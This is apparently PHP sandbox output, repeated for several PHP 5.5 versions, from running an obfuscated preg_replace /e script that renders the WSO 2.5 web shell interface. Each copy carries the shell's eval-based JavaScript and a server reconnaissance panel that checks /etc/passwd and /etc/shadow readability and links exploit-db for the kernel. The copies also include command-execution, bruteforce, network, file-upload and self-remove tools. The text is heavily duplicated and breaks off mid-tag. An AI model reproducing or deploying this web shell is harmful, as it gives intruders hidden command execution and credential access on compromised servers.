2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.8
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.8 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.7
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.7 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.6
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.6 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.5
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.5 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input 